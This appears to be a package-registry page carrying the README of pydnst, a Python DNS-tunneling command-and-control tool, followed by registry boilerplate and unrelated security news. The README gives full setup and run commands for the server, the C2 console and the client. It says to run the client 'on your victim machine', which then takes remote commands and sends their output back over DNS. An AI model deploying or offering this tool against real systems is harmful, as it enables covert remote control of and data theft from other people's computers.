DNS Tunneling client and server in Python
pip3 install pydnst
For convenience the client, server, and c2 are in the same package, however the "rich" dependency is only used by the c2 module.
pydnst is a DNS tunneling implementation in Python, supporting Linux only (the client might require a few paths tweaks to run on Windows).
A simple rich interface on the server side enables to send commands to specific clients, and watch the responses in real-time.
The client sends keep-alive requests every 30 seconds. If the server has a command to send to a specific client, it sends it in response to a keep-alive. Then the client sends other queries containing the command response.
The server can manage up to 250 clients, communication is encrypted with a unique Fernet key per client, generated on the fly and shared using RSA encryption.
The client being implemented in Python is not stealth, and intentionally exposes its hostname in clear text (you can tweak that).
First acquire access to a machine with a public IP, this is where the pydnst server will run.
Then acquire a DNS name, as short as possible, and configure its nameservers with glue records pointing to your public IP.
You can then configure your pydnst.toml field DNST_SERVER_NAME, and run pydnst server on your public machine, and pydnst client on your victim machine.
Of course you can also experiment with it in a local environment similarly configured.
pip3 install pydnst
python3 -m pydnst --help
This creates server_private.pem (copy to server) and server_public.pem (copy to client). After copying server_private.pem to server, don't forget to chmod 600.
python3 -m pydnst create_certificates
This creates pydnst.toml : edit if needed and then copy to client and server.
On client, edit the MAIN_INTERFACE to use the DNS server of this interface, or DNS_SERVER_ADDRESS to circumvent it.
On server, edit the LISTENING_INTERFACE.
On both, specify the DNST_SERVER_NAME (the DNS name purchased).
python3 -m pydnst config
In one terminal, run the server (pydnst.toml must be in the current directory) :
Logs are under pydnst.log
python3 -m pydnst server run
In another terminal, run the c2 commander (pydnst.toml must be in the current directory), which enables to send commands and watch responses in real-time.
python3 -m pydnst server c2
In one terminal, run the client (pydnst.toml must be in the current directory) :
Logs are under pydnst.log
python3 -m pydnst client run
FAQs
DNS Tunneling client and server
We found that pydnst demonstrated a healthy version release cadence and project activity because the last version was released less than a year ago. It has 1 open source maintainer collaborating on the project.
Did you know?
Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.
Security News
GitHub removed 27 malicious pull requests attempting to inject harmful code across multiple open source repositories, in another round of low-effort attacks.
Security News
RubyGems.org has added a new "maintainer" role that allows for publishing new versions of gems. This new permission type is aimed at improving security for gem owners and the service overall.
Security News
Node.js will be enforcing stricter semver-major PR policies a month before major releases to enhance stability and ensure reliable release candidates.